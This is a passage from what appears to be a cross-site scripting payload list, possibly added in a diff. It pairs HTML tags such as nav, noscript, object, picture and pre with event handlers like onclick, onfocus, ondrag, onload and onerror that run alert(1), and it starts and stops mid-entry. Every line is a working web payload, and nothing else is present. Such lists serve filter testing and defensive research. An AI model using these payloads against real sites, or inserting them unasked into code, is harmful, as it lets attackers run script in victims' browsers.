onactivate=alert(1)></multicol> +<multicol id=x tabindex=1 onbeforeactivate=alert(1)></multicol> +<multicol id=x tabindex=1 onbeforedeactivate=alert(1)></multicol><input autofocus> +<multicol id=x tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus> +<multicol id=x tabindex=1 onfocus=alert(1)></multicol> +<multicol id=x tabindex=1 onfocusin=alert(1)></multicol> +<multicol onbeforecopy="alert(1)" contenteditable>test</multicol> +<multicol onbeforecut="alert(1)" contenteditable>test</multicol> +<multicol onbeforepaste="alert(1)" contenteditable>test</multicol> +<multicol onblur=alert(1) tabindex=1 id=x></multicol><input autofocus> +<multicol onclick="alert(1)">test</multicol> +<multicol oncontextmenu="alert(1)">test</multicol> +<multicol oncopy="alert(1)" contenteditable>test</multicol> +<multicol oncut="alert(1)" contenteditable>test</multicol> +<multicol ondblclick="alert(1)">test</multicol> +<multicol onfocusout=alert(1) tabindex=1 id=x></multicol><input autofocus> +<multicol onkeydown="alert(1)" contenteditable>test</multicol> +<multicol onkeypress="alert(1)" contenteditable>test</multicol> +<multicol onkeyup="alert(1)" contenteditable>test</multicol> +<multicol onmousedown="alert(1)">test</multicol> +<multicol onmouseenter="alert(1)">test</multicol> +<multicol onmouseleave="alert(1)">test</multicol> +<multicol onmousemove="alert(1)">test</multicol> +<multicol onmouseout="alert(1)">test</multicol> +<multicol onmouseover="alert(1)">test</multicol> +<multicol onmouseup="alert(1)">test</multicol> +<multicol onpaste="alert(1)" contenteditable>test</multicol> +<nav draggable="true" ondrag="alert(1)">test</nav> +<nav draggable="true" ondragend="alert(1)">test</nav> +<nav draggable="true" ondragenter="alert(1)">test</nav> +<nav draggable="true" ondragleave="alert(1)">test</nav> +<nav draggable="true" ondragstart="alert(1)">test</nav> +<nav id=x tabindex=1 onactivate=alert(1)></nav> +<nav id=x tabindex=1 onbeforeactivate=alert(1)></nav> +<nav id=x tabindex=1 onbeforedeactivate=alert(1)></nav><input autofocus> +<nav id=x tabindex=1 ondeactivate=alert(1)></nav><input id=y autofocus> +<nav id=x tabindex=1 onfocus=alert(1)></nav> +<nav id=x tabindex=1 onfocusin=alert(1)></nav> +<nav onbeforecopy="alert(1)" contenteditable>test</nav> +<nav onbeforecut="alert(1)" contenteditable>test</nav> +<nav onbeforepaste="alert(1)" contenteditable>test</nav> +<nav onblur=alert(1) tabindex=1 id=x></nav><input autofocus> +<nav onclick="alert(1)">test</nav> +<nav oncontextmenu="alert(1)">test</nav> +<nav oncopy="alert(1)" contenteditable>test</nav> +<nav oncut="alert(1)" contenteditable>test</nav> +<nav ondblclick="alert(1)">test</nav> +<nav onfocusout=alert(1) tabindex=1 id=x></nav><input autofocus> +<nav onkeydown="alert(1)" contenteditable>test</nav> +<nav onkeypress="alert(1)" contenteditable>test</nav> +<nav onkeyup="alert(1)" contenteditable>test</nav> +<nav onmousedown="alert(1)">test</nav> +<nav onmouseenter="alert(1)">test</nav> +<nav onmouseleave="alert(1)">test</nav> +<nav onmousemove="alert(1)">test</nav> +<nav onmouseout="alert(1)">test</nav> +<nav onmouseover="alert(1)">test</nav> +<nav onmouseup="alert(1)">test</nav> +<nav onpaste="alert(1)" contenteditable>test</nav> +<nextid draggable="true" ondrag="alert(1)">test</nextid> +<nextid draggable="true" ondragend="alert(1)">test</nextid> +<nextid draggable="true" ondragenter="alert(1)">test</nextid> +<nextid draggable="true" ondragleave="alert(1)">test</nextid> +<nextid draggable="true" ondragstart="alert(1)">test</nextid> +<nextid id=x tabindex=1 onactivate=alert(1)></nextid> +<nextid id=x tabindex=1 onbeforeactivate=alert(1)></nextid> +<nextid id=x tabindex=1 onbeforedeactivate=alert(1)></nextid><input autofocus> +<nextid id=x tabindex=1 ondeactivate=alert(1)></nextid><input id=y autofocus> +<nextid id=x tabindex=1 onfocus=alert(1)></nextid> +<nextid id=x tabindex=1 onfocusin=alert(1)></nextid> +<nextid onbeforecopy="alert(1)" contenteditable>test</nextid> +<nextid onbeforecut="alert(1)" contenteditable>test</nextid> +<nextid onbeforepaste="alert(1)" contenteditable>test</nextid> +<nextid onblur=alert(1) tabindex=1 id=x></nextid><input autofocus> +<nextid onclick="alert(1)">test</nextid> +<nextid oncontextmenu="alert(1)">test</nextid> +<nextid oncopy="alert(1)" contenteditable>test</nextid> +<nextid oncut="alert(1)" contenteditable>test</nextid> +<nextid ondblclick="alert(1)">test</nextid> +<nextid onfocusout=alert(1) tabindex=1 id=x></nextid><input autofocus> +<nextid onkeydown="alert(1)" contenteditable>test</nextid> +<nextid onkeypress="alert(1)" contenteditable>test</nextid> +<nextid onkeyup="alert(1)" contenteditable>test</nextid> +<nextid onmousedown="alert(1)">test</nextid> +<nextid onmouseenter="alert(1)">test</nextid> +<nextid onmouseleave="alert(1)">test</nextid> +<nextid onmousemove="alert(1)">test</nextid> +<nextid onmouseout="alert(1)">test</nextid> +<nextid onmouseover="alert(1)">test</nextid> +<nextid onmouseup="alert(1)">test</nextid> +<nextid onpaste="alert(1)" contenteditable>test</nextid> +<nobr draggable="true" ondrag="alert(1)">test</nobr> +<nobr draggable="true" ondragend="alert(1)">test</nobr> +<nobr draggable="true" ondragenter="alert(1)">test</nobr> +<nobr draggable="true" ondragleave="alert(1)">test</nobr> +<nobr draggable="true" ondragstart="alert(1)">test</nobr> +<nobr id=x tabindex=1 onactivate=alert(1)></nobr> +<nobr id=x tabindex=1 onbeforeactivate=alert(1)></nobr> +<nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus> +<nobr id=x tabindex=1 ondeactivate=alert(1)></nobr><input id=y autofocus> +<nobr id=x tabindex=1 onfocus=alert(1)></nobr> +<nobr id=x tabindex=1 onfocusin=alert(1)></nobr> +<nobr onbeforecopy="alert(1)" contenteditable>test</nobr> +<nobr onbeforecut="alert(1)" contenteditable>test</nobr> +<nobr onbeforepaste="alert(1)" contenteditable>test</nobr> +<nobr onblur=alert(1) tabindex=1 id=x></nobr><input autofocus> +<nobr onclick="alert(1)">test</nobr> +<nobr oncontextmenu="alert(1)">test</nobr> +<nobr oncopy="alert(1)" contenteditable>test</nobr> +<nobr oncut="alert(1)" contenteditable>test</nobr> +<nobr ondblclick="alert(1)">test</nobr> +<nobr onfocusout=alert(1) tabindex=1 id=x></nobr><input autofocus> +<nobr onkeydown="alert(1)" contenteditable>test</nobr> +<nobr onkeypress="alert(1)" contenteditable>test</nobr> +<nobr onkeyup="alert(1)" contenteditable>test</nobr> +<nobr onmousedown="alert(1)">test</nobr> +<nobr onmouseenter="alert(1)">test</nobr> +<nobr onmouseleave="alert(1)">test</nobr> +<nobr onmousemove="alert(1)">test</nobr> +<nobr onmouseout="alert(1)">test</nobr> +<nobr onmouseover="alert(1)">test</nobr> +<nobr onmouseup="alert(1)">test</nobr> +<nobr onpaste="alert(1)" contenteditable>test</nobr> +<noembed draggable="true" ondrag="alert(1)">test</noembed> +<noembed draggable="true" ondragend="alert(1)">test</noembed> +<noembed draggable="true" ondragenter="alert(1)">test</noembed> +<noembed draggable="true" ondragleave="alert(1)">test</noembed> +<noembed draggable="true" ondragstart="alert(1)">test</noembed> +<noembed id=x tabindex=1 onactivate=alert(1)></noembed> +<noembed id=x tabindex=1 onbeforeactivate=alert(1)></noembed> +<noembed id=x tabindex=1 onbeforedeactivate=alert(1)></noembed><input autofocus> +<noembed id=x tabindex=1 ondeactivate=alert(1)></noembed><input id=y autofocus> +<noembed id=x tabindex=1 onfocus=alert(1)></noembed> +<noembed id=x tabindex=1 onfocusin=alert(1)></noembed> +<noembed onbeforecopy="alert(1)" contenteditable>test</noembed> +<noembed onbeforecut="alert(1)" contenteditable>test</noembed> +<noembed onbeforepaste="alert(1)" contenteditable>test</noembed> +<noembed onblur=alert(1) tabindex=1 id=x></noembed><input autofocus> +<noembed onclick="alert(1)">test</noembed> +<noembed oncontextmenu="alert(1)">test</noembed> +<noembed oncopy="alert(1)" contenteditable>test</noembed> +<noembed oncut="alert(1)" contenteditable>test</noembed> +<noembed ondblclick="alert(1)">test</noembed> +<noembed onfocusout=alert(1) tabindex=1 id=x></noembed><input autofocus> +<noembed onkeydown="alert(1)" contenteditable>test</noembed> +<noembed onkeypress="alert(1)" contenteditable>test</noembed> +<noembed onkeyup="alert(1)" contenteditable>test</noembed> +<noembed onmousedown="alert(1)">test</noembed> +<noembed onmouseenter="alert(1)">test</noembed> +<noembed onmouseleave="alert(1)">test</noembed> +<noembed onmousemove="alert(1)">test</noembed> +<noembed onmouseout="alert(1)">test</noembed> +<noembed onmouseover="alert(1)">test</noembed> +<noembed onmouseup="alert(1)">test</noembed> +<noembed onpaste="alert(1)" contenteditable>test</noembed> +<noframes draggable="true" ondrag="alert(1)">test</noframes> +<noframes draggable="true" ondragend="alert(1)">test</noframes> +<noframes draggable="true" ondragenter="alert(1)">test</noframes> +<noframes draggable="true" ondragleave="alert(1)">test</noframes> +<noframes draggable="true" ondragstart="alert(1)">test</noframes> +<noframes id=x tabindex=1 onactivate=alert(1)></noframes> +<noframes id=x tabindex=1 onbeforeactivate=alert(1)></noframes> +<noframes id=x tabindex=1 onbeforedeactivate=alert(1)></noframes><input autofocus> +<noframes id=x tabindex=1 ondeactivate=alert(1)></noframes><input id=y autofocus> +<noframes id=x tabindex=1 onfocus=alert(1)></noframes> +<noframes id=x tabindex=1 onfocusin=alert(1)></noframes> +<noframes onbeforecopy="alert(1)" contenteditable>test</noframes> +<noframes onbeforecut="alert(1)" contenteditable>test</noframes> +<noframes onbeforepaste="alert(1)" contenteditable>test</noframes> +<noframes onblur=alert(1) tabindex=1 id=x></noframes><input autofocus> +<noframes onclick="alert(1)">test</noframes> +<noframes oncontextmenu="alert(1)">test</noframes> +<noframes oncopy="alert(1)" contenteditable>test</noframes> +<noframes oncut="alert(1)" contenteditable>test</noframes> +<noframes ondblclick="alert(1)">test</noframes> +<noframes onfocusout=alert(1) tabindex=1 id=x></noframes><input autofocus> +<noframes onkeydown="alert(1)" contenteditable>test</noframes> +<noframes onkeypress="alert(1)" contenteditable>test</noframes> +<noframes onkeyup="alert(1)" contenteditable>test</noframes> +<noframes onmousedown="alert(1)">test</noframes> +<noframes onmouseenter="alert(1)">test</noframes> +<noframes onmouseleave="alert(1)">test</noframes> +<noframes onmousemove="alert(1)">test</noframes> +<noframes onmouseout="alert(1)">test</noframes> +<noframes onmouseover="alert(1)">test</noframes> +<noframes onmouseup="alert(1)">test</noframes> +<noframes onpaste="alert(1)" contenteditable>test</noframes> +<noscript draggable="true" ondrag="alert(1)">test</noscript> +<noscript draggable="true" ondragend="alert(1)">test</noscript> +<noscript draggable="true" ondragenter="alert(1)">test</noscript> +<noscript draggable="true" ondragleave="alert(1)">test</noscript> +<noscript draggable="true" ondragstart="alert(1)">test</noscript> +<noscript id=x tabindex=1 onactivate=alert(1)></noscript> +<noscript id=x tabindex=1 onbeforeactivate=alert(1)></noscript> +<noscript id=x tabindex=1 onbeforedeactivate=alert(1)></noscript><input autofocus> +<noscript id=x tabindex=1 ondeactivate=alert(1)></noscript><input id=y autofocus> +<noscript id=x tabindex=1 onfocus=alert(1)></noscript> +<noscript id=x tabindex=1 onfocusin=alert(1)></noscript> +<noscript onbeforecopy="alert(1)" contenteditable>test</noscript> +<noscript onbeforecut="alert(1)" contenteditable>test</noscript> +<noscript onbeforepaste="alert(1)" contenteditable>test</noscript> +<noscript onblur=alert(1) tabindex=1 id=x></noscript><input autofocus> +<noscript onclick="alert(1)">test</noscript> +<noscript oncontextmenu="alert(1)">test</noscript> +<noscript oncopy="alert(1)" contenteditable>test</noscript> +<noscript oncut="alert(1)" contenteditable>test</noscript> +<noscript ondblclick="alert(1)">test</noscript> +<noscript onfocusout=alert(1) tabindex=1 id=x></noscript><input autofocus> +<noscript onkeydown="alert(1)" contenteditable>test</noscript> +<noscript onkeypress="alert(1)" contenteditable>test</noscript> +<noscript onkeyup="alert(1)" contenteditable>test</noscript> +<noscript onmousedown="alert(1)">test</noscript> +<noscript onmouseenter="alert(1)">test</noscript> +<noscript onmouseleave="alert(1)">test</noscript> +<noscript onmousemove="alert(1)">test</noscript> +<noscript onmouseout="alert(1)">test</noscript> +<noscript onmouseover="alert(1)">test</noscript> +<noscript onmouseup="alert(1)">test</noscript> +<noscript onpaste="alert(1)" contenteditable>test</noscript> +<object data=/ onload=alert(1)> +<object data=/ onreadystatechange=alert(1)> +<object draggable="true" ondrag="alert(1)">test</object> +<object draggable="true" ondragend="alert(1)">test</object> +<object draggable="true" ondragenter="alert(1)">test</object> +<object draggable="true" ondragleave="alert(1)">test</object> +<object draggable="true" ondragstart="alert(1)">test</object> +<object id=x onfocus=alert(1) type=text/html> +<object id=x onfocusin=alert(1) type=text/html> +<object id=x tabindex=1 onactivate=alert(1)></object> +<object id=x tabindex=1 onbeforeactivate=alert(1)></object> +<object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus> +<object id=x tabindex=1 ondeactivate=alert(1)></object><input id=y autofocus> +<object onbeforecopy="alert(1)" contenteditable>test</object> +<object onbeforecut="alert(1)" contenteditable>test</object> +<object onbeforepaste="alert(1)" contenteditable>test</object> +<object onblur=alert(1) tabindex=1 id=x></object><input autofocus> +<object onclick="alert(1)">test</object> +<object oncontextmenu="alert(1)">test</object> +<object oncopy="alert(1)" contenteditable>test</object> +<object oncut="alert(1)" contenteditable>test</object> +<object ondblclick="alert(1)">test</object> +<object onerror=alert(1) data=1 type=image/gif> +<object onfocusout=alert(1) tabindex=1 id=x></object><input autofocus> +<object onkeydown="alert(1)" contenteditable>test</object> +<object onkeypress="alert(1)" contenteditable>test</object> +<object onkeyup="alert(1)" contenteditable>test</object> +<object onmousedown="alert(1)">test</object> +<object onmouseenter="alert(1)">test</object> +<object onmouseleave="alert(1)">test</object> +<object onmousemove="alert(1)">test</object> +<object onmouseout="alert(1)">test</object> +<object onmouseover="alert(1)">test</object> +<object onmouseup="alert(1)">test</object> +<object onpaste="alert(1)" contenteditable>test</object> +<ol draggable="true" ondrag="alert(1)">test</ol> +<ol draggable="true" ondragend="alert(1)">test</ol> +<ol draggable="true" ondragenter="alert(1)">test</ol> +<ol draggable="true" ondragleave="alert(1)">test</ol> +<ol draggable="true" ondragstart="alert(1)">test</ol> +<ol id=x tabindex=1 onactivate=alert(1)></ol> +<ol id=x tabindex=1 onbeforeactivate=alert(1)></ol> +<ol id=x tabindex=1 onbeforedeactivate=alert(1)></ol><input autofocus> +<ol id=x tabindex=1 ondeactivate=alert(1)></ol><input id=y autofocus> +<ol id=x tabindex=1 onfocus=alert(1)></ol> +<ol id=x tabindex=1 onfocusin=alert(1)></ol> +<ol onbeforecopy="alert(1)" contenteditable>test</ol> +<ol onbeforecut="alert(1)" contenteditable>test</ol> +<ol onbeforepaste="alert(1)" contenteditable>test</ol> +<ol onblur=alert(1) tabindex=1 id=x></ol><input autofocus> +<ol onclick="alert(1)">test</ol> +<ol oncontextmenu="alert(1)">test</ol> +<ol oncopy="alert(1)" contenteditable>test</ol> +<ol oncut="alert(1)" contenteditable>test</ol> +<ol ondblclick="alert(1)">test</ol> +<ol onfocusout=alert(1) tabindex=1 id=x></ol><input autofocus> +<ol onkeydown="alert(1)" contenteditable>test</ol> +<ol onkeypress="alert(1)" contenteditable>test</ol> +<ol onkeyup="alert(1)" contenteditable>test</ol> +<ol onmousedown="alert(1)">test</ol> +<ol onmouseenter="alert(1)">test</ol> +<ol onmouseleave="alert(1)">test</ol> +<ol onmousemove="alert(1)">test</ol> +<ol onmouseout="alert(1)">test</ol> +<ol onmouseover="alert(1)">test</ol> +<ol onmouseup="alert(1)">test</ol> +<ol onpaste="alert(1)" contenteditable>test</ol> +<optgroup draggable="true" ondrag="alert(1)">test</optgroup> +<optgroup draggable="true" ondragend="alert(1)">test</optgroup> +<optgroup draggable="true" ondragenter="alert(1)">test</optgroup> +<optgroup draggable="true" ondragleave="alert(1)">test</optgroup> +<optgroup draggable="true" ondragstart="alert(1)">test</optgroup> +<optgroup id=x tabindex=1 onactivate=alert(1)></optgroup> +<optgroup id=x tabindex=1 onbeforeactivate=alert(1)></optgroup> +<optgroup id=x tabindex=1 onbeforedeactivate=alert(1)></optgroup><input autofocus> +<optgroup id=x tabindex=1 ondeactivate=alert(1)></optgroup><input id=y autofocus> +<optgroup id=x tabindex=1 onfocus=alert(1)></optgroup> +<optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup> +<optgroup onbeforecopy="alert(1)" contenteditable>test</optgroup> +<optgroup onbeforecut="alert(1)" contenteditable>test</optgroup> +<optgroup onbeforepaste="alert(1)" contenteditable>test</optgroup> +<optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus> +<optgroup onclick="alert(1)">test</optgroup> +<optgroup oncontextmenu="alert(1)">test</optgroup> +<optgroup oncopy="alert(1)" contenteditable>test</optgroup> +<optgroup oncut="alert(1)" contenteditable>test</optgroup> +<optgroup ondblclick="alert(1)">test</optgroup> +<optgroup onfocusout=alert(1) tabindex=1 id=x></optgroup><input autofocus> +<optgroup onkeydown="alert(1)" contenteditable>test</optgroup> +<optgroup onkeypress="alert(1)" contenteditable>test</optgroup> +<optgroup onkeyup="alert(1)" contenteditable>test</optgroup> +<optgroup onmousedown="alert(1)">test</optgroup> +<optgroup onmouseenter="alert(1)">test</optgroup> +<optgroup onmouseleave="alert(1)">test</optgroup> +<optgroup onmousemove="alert(1)">test</optgroup> +<optgroup onmouseout="alert(1)">test</optgroup> +<optgroup onmouseover="alert(1)">test</optgroup> +<optgroup onmouseup="alert(1)">test</optgroup> +<optgroup onpaste="alert(1)" contenteditable>test</optgroup> +<option draggable="true" ondrag="alert(1)">test</option> +<option draggable="true" ondragend="alert(1)">test</option> +<option draggable="true" ondragenter="alert(1)">test</option> +<option draggable="true" ondragleave="alert(1)">test</option> +<option draggable="true" ondragstart="alert(1)">test</option> +<option id=x tabindex=1 onactivate=alert(1)></option> +<option id=x tabindex=1 onbeforeactivate=alert(1)></option> +<option id=x tabindex=1 onbeforedeactivate=alert(1)></option><input autofocus> +<option id=x tabindex=1 ondeactivate=alert(1)></option><input id=y autofocus> +<option id=x tabindex=1 onfocus=alert(1)></option> +<option id=x tabindex=1 onfocusin=alert(1)></option> +<option onbeforecopy="alert(1)" contenteditable>test</option> +<option onbeforecut="alert(1)" contenteditable>test</option> +<option onbeforepaste="alert(1)" contenteditable>test</option> +<option onblur=alert(1) tabindex=1 id=x></option><input autofocus> +<option onclick="alert(1)">test</option> +<option oncontextmenu="alert(1)">test</option> +<option oncopy="alert(1)" contenteditable>test</option> +<option oncut="alert(1)" contenteditable>test</option> +<option ondblclick="alert(1)">test</option> +<option onfocusout=alert(1) tabindex=1 id=x></option><input autofocus> +<option onkeydown="alert(1)" contenteditable>test</option> +<option onkeypress="alert(1)" contenteditable>test</option> +<option onkeyup="alert(1)" contenteditable>test</option> +<option onmousedown="alert(1)">test</option> +<option onmouseenter="alert(1)">test</option> +<option onmouseleave="alert(1)">test</option> +<option onmousemove="alert(1)">test</option> +<option onmouseout="alert(1)">test</option> +<option onmouseover="alert(1)">test</option> +<option onmouseup="alert(1)">test</option> +<option onpaste="alert(1)" contenteditable>test</option> +<output draggable="true" ondrag="alert(1)">test</output> +<output draggable="true" ondragend="alert(1)">test</output> +<output draggable="true" ondragenter="alert(1)">test</output> +<output draggable="true" ondragleave="alert(1)">test</output> +<output draggable="true" ondragstart="alert(1)">test</output> +<output id=x tabindex=1 onactivate=alert(1)></output> +<output id=x tabindex=1 onbeforeactivate=alert(1)></output> +<output id=x tabindex=1 onbeforedeactivate=alert(1)></output><input autofocus> +<output id=x tabindex=1 ondeactivate=alert(1)></output><input id=y autofocus> +<output id=x tabindex=1 onfocus=alert(1)></output> +<output id=x tabindex=1 onfocusin=alert(1)></output> +<output onbeforecopy="alert(1)" contenteditable>test</output> +<output onbeforecut="alert(1)" contenteditable>test</output> +<output onbeforepaste="alert(1)" contenteditable>test</output> +<output onblur=alert(1) tabindex=1 id=x></output><input autofocus> +<output onclick="alert(1)">test</output> +<output oncontextmenu="alert(1)">test</output> +<output oncopy="alert(1)" contenteditable>test</output> +<output oncut="alert(1)" contenteditable>test</output> +<output ondblclick="alert(1)">test</output> +<output onfocusout=alert(1) tabindex=1 id=x></output><input autofocus> +<output onkeydown="alert(1)" contenteditable>test</output> +<output onkeypress="alert(1)" contenteditable>test</output> +<output onkeyup="alert(1)" contenteditable>test</output> +<output onmousedown="alert(1)">test</output> +<output onmouseenter="alert(1)">test</output> +<output onmouseleave="alert(1)">test</output> +<output onmousemove="alert(1)">test</output> +<output onmouseout="alert(1)">test</output> +<output onmouseover="alert(1)">test</output> +<output onmouseup="alert(1)">test</output> +<output onpaste="alert(1)" contenteditable>test</output> +<p draggable="true" ondrag="alert(1)">test</p> +<p draggable="true" ondragend="alert(1)">test</p> +<p draggable="true" ondragenter="alert(1)">test</p> +<p draggable="true" ondragleave="alert(1)">test</p> +<p draggable="true" ondragstart="alert(1)">test</p> +<p id=x tabindex=1 onactivate=alert(1)></p> +<p id=x tabindex=1 onbeforeactivate=alert(1)></p> +<p id=x tabindex=1 onbeforedeactivate=alert(1)></p><input autofocus> +<p id=x tabindex=1 ondeactivate=alert(1)></p><input id=y autofocus> +<p id=x tabindex=1 onfocus=alert(1)></p> +<p id=x tabindex=1 onfocusin=alert(1)></p> +<p onbeforecopy="alert(1)" contenteditable>test</p> +<p onbeforecut="alert(1)" contenteditable>test</p> +<p onbeforepaste="alert(1)" contenteditable>test</p> +<p onblur=alert(1) tabindex=1 id=x></p><input autofocus> +<p onclick="alert(1)">test</p> +<p oncontextmenu="alert(1)">test</p> +<p oncopy="alert(1)" contenteditable>test</p> +<p oncut="alert(1)" contenteditable>test</p> +<p ondblclick="alert(1)">test</p> +<p onfocusout=alert(1) tabindex=1 id=x></p><input autofocus> +<p onkeydown="alert(1)" contenteditable>test</p> +<p onkeypress="alert(1)" contenteditable>test</p> +<p onkeyup="alert(1)" contenteditable>test</p> +<p onmousedown="alert(1)">test</p> +<p onmouseenter="alert(1)">test</p> +<p onmouseleave="alert(1)">test</p> +<p onmousemove="alert(1)">test</p> +<p onmouseout="alert(1)">test</p> +<p onmouseover="alert(1)">test</p> +<p onmouseup="alert(1)">test</p> +<p onpaste="alert(1)" contenteditable>test</p> +<param draggable="true" ondrag="alert(1)">test</param> +<param draggable="true" ondragend="alert(1)">test</param> +<param draggable="true" ondragenter="alert(1)">test</param> +<param draggable="true" ondragleave="alert(1)">test</param> +<param draggable="true" ondragstart="alert(1)">test</param> +<param id=x tabindex=1 onactivate=alert(1)></param> +<param id=x tabindex=1 onbeforeactivate=alert(1)></param> +<param id=x tabindex=1 onbeforedeactivate=alert(1)></param><input autofocus> +<param id=x tabindex=1 ondeactivate=alert(1)></param><input id=y autofocus> +<param id=x tabindex=1 onfocus=alert(1)></param> +<param id=x tabindex=1 onfocusin=alert(1)></param> +<param onbeforecopy="alert(1)" contenteditable>test</param> +<param onbeforecut="alert(1)" contenteditable>test</param> +<param onbeforepaste="alert(1)" contenteditable>test</param> +<param onblur=alert(1) tabindex=1 id=x></param><input autofocus> +<param onclick="alert(1)">test</param> +<param oncontextmenu="alert(1)">test</param> +<param oncopy="alert(1)" contenteditable>test</param> +<param oncut="alert(1)" contenteditable>test</param> +<param ondblclick="alert(1)">test</param> +<param onfocusout=alert(1) tabindex=1 id=x></param><input autofocus> +<param onkeydown="alert(1)" contenteditable>test</param> +<param onkeypress="alert(1)" contenteditable>test</param> +<param onkeyup="alert(1)" contenteditable>test</param> +<param onmousedown="alert(1)">test</param> +<param onmouseenter="alert(1)">test</param> +<param onmouseleave="alert(1)">test</param> +<param onmousemove="alert(1)">test</param> +<param onmouseout="alert(1)">test</param> +<param onmouseover="alert(1)">test</param> +<param onmouseup="alert(1)">test</param> +<param onpaste="alert(1)" contenteditable>test</param> +<picture draggable="true" ondrag="alert(1)">test</picture> +<picture draggable="true" ondragend="alert(1)">test</picture> +<picture draggable="true" ondragenter="alert(1)">test</picture> +<picture draggable="true" ondragleave="alert(1)">test</picture> +<picture draggable="true" ondragstart="alert(1)">test</picture> +<picture id=x tabindex=1 onactivate=alert(1)></picture> +<picture id=x tabindex=1 onbeforeactivate=alert(1)></picture> +<picture id=x tabindex=1 onbeforedeactivate=alert(1)></picture><input autofocus> +<picture id=x tabindex=1 ondeactivate=alert(1)></picture><input id=y autofocus> +<picture id=x tabindex=1 onfocus=alert(1)></picture> +<picture id=x tabindex=1 onfocusin=alert(1)></picture> +<picture onbeforecopy="alert(1)" contenteditable>test</picture> +<picture onbeforecut="alert(1)" contenteditable>test</picture> +<picture onbeforepaste="alert(1)" contenteditable>test</picture> +<picture onblur=alert(1) tabindex=1 id=x></picture><input autofocus> +<picture onclick="alert(1)">test</picture> +<picture oncontextmenu="alert(1)">test</picture> +<picture oncopy="alert(1)" contenteditable>test</picture> +<picture oncut="alert(1)" contenteditable>test</picture> +<picture ondblclick="alert(1)">test</picture> +<picture onfocusout=alert(1) tabindex=1 id=x></picture><input autofocus> +<picture onkeydown="alert(1)" contenteditable>test</picture> +<picture onkeypress="alert(1)" contenteditable>test</picture> +<picture onkeyup="alert(1)" contenteditable>test</picture> +<picture onmousedown="alert(1)">test</picture> +<picture onmouseenter="alert(1)">test</picture> +<picture onmouseleave="alert(1)">test</picture> +<picture onmousemove="alert(1)">test</picture> +<picture onmouseout="alert(1)">test</picture> +<picture onmouseover="alert(1)">test</picture> +<picture onmouseup="alert(1)">test</picture> +<picture onpaste="alert(1)" contenteditable>test</picture> +<picture><source srcset="validimage.png"><image onload=alert(1)></picture> +<picture><source srcset="validimage.png"><image onloadend=alert(1)></picture> +<picture><source srcset="validimage.png"><image onloadstart=alert(1)></picture> +<picture><source srcset="validimage.png"><img onload=alert(1)></picture> +<picture><source srcset="validimage.png"><img onloadend=alert(1)></picture> +<picture><source srcset="validimage.png"><img onloadstart=alert(1)></picture> +<plaintext draggable="true" ondrag="alert(1)">test</plaintext> +<plaintext draggable="true" ondragend="alert(1)">test</plaintext> +<plaintext draggable="true" ondragenter="alert(1)">test</plaintext> +<plaintext draggable="true" ondragleave="alert(1)">test</plaintext> +<plaintext draggable="true" ondragstart="alert(1)">test</plaintext> +<plaintext id=x tabindex=1 onactivate=alert(1)></plaintext> +<plaintext id=x tabindex=1 onbeforeactivate=alert(1)></plaintext> +<plaintext id=x tabindex=1 onbeforedeactivate=alert(1)></plaintext><input autofocus> +<plaintext id=x tabindex=1 ondeactivate=alert(1)></plaintext><input id=y autofocus> +<plaintext id=x tabindex=1 onfocus=alert(1)></plaintext> +<plaintext id=x tabindex=1 onfocusin=alert(1)></plaintext> +<plaintext onbeforecopy="alert(1)" contenteditable>test</plaintext> +<plaintext onbeforecut="alert(1)" contenteditable>test</plaintext> +<plaintext onbeforepaste="alert(1)" contenteditable>test</plaintext> +<plaintext onblur=alert(1) tabindex=1 id=x></plaintext><input autofocus> +<plaintext onclick="alert(1)">test</plaintext> +<plaintext oncontextmenu="alert(1)">test</plaintext> +<plaintext oncopy="alert(1)" contenteditable>test</plaintext> +<plaintext oncut="alert(1)" contenteditable>test</plaintext> +<plaintext ondblclick="alert(1)">test</plaintext> +<plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus> +<plaintext onkeydown="alert(1)" contenteditable>test</plaintext> +<plaintext onkeypress="alert(1)" contenteditable>test</plaintext> +<plaintext onkeyup="alert(1)" contenteditable>test</plaintext> +<plaintext onmousedown="alert(1)">test</plaintext> +<plaintext onmouseenter="alert(1)">test</plaintext> +<plaintext onmouseleave="alert(1)">test</plaintext> +<plaintext onmousemove="alert(1)">test</plaintext> +<plaintext onmouseout="alert(1)">test</plaintext> +<plaintext onmouseover="alert(1)">test</plaintext> +<plaintext onmouseup="alert(1)">test</plaintext> +<plaintext onpaste="alert(1)" contenteditable>test</plaintext> +<pre draggable="true" ondrag="alert(1)">test</pre> +<pre draggable="true" ondragend="alert(1)">test</pre> +<pre draggable="true" ondragenter="alert(1)">test</pre> +<pre draggable="true" ondragleave="alert(1)">test</pre> +<pre draggable="true" ondragstart="alert(1)">test</pre> +<pre id=x tabindex=1 onactivate=alert(1)></pre> +<pre id=x tabindex=1 onbeforeactivate=alert(1)></pre> +<pre id=x tabindex=1 onbeforedeactivate=alert(1)></pre><input autofocus> +<pre id=x tabindex=1 ondeactivate=alert(1)></pre><input id=y autofocus> +<pre id=x tabindex=1 onfocus=alert(1)></pre> +<pre id=x tabindex=1 onfocusin=alert(1)></pre> +<pre onbeforecopy="alert(1)" contenteditable>test</pre> +<pre onbeforecut="alert(1)" contenteditable>test</pre> +<pre onbeforepaste="alert(1)" contenteditable>test</pre> +<pre onblur=alert(1) tabindex=1 id=x></pre><input autofocus> +<pre onclick="alert(1)">test</pre> +<pre oncontextmenu="alert(1)">test</pre> +<pre oncopy="alert(1)" contenteditable>test</pre> +<pre oncut="alert(1)" contenteditable>test</pre> +<pre ondblclick="alert(1)">test</pre> +<pre onfocusout=alert(1) tabindex=1 id=x></pre><input autofocus> +<pre onkeydown="alert(1)" contenteditable>test</pre> +<pre onkeypress="alert(1)" contenteditable>test</pre> +<pre onkeyup="alert(1)" contenteditable>test</pre> +<pre onmousedown="alert(1)">test</pre> +<pre onmouseenter="alert(1)">test</pre> +<pre onmouseleave="alert(1)">test</pre> +<pre onmousemove="alert(1)">test</pre> +<pre onmouseout="alert(1)">test</pre> +<pre onmouseover="alert(1)">test</pre> +<pre onmouseup="alert(1)">test</pre> +<pre onpaste="alert(1)" contenteditable>test</pre> +<progress draggable="true" ondrag="alert(1)">test</progress> +<progress draggable="true" ondragend="alert(1)">test</progress> +<progress draggable="true" ondragenter="alert(1)">test</progress> +<progress draggable="true" ondragleave="alert(1)">test</progress> +<progress 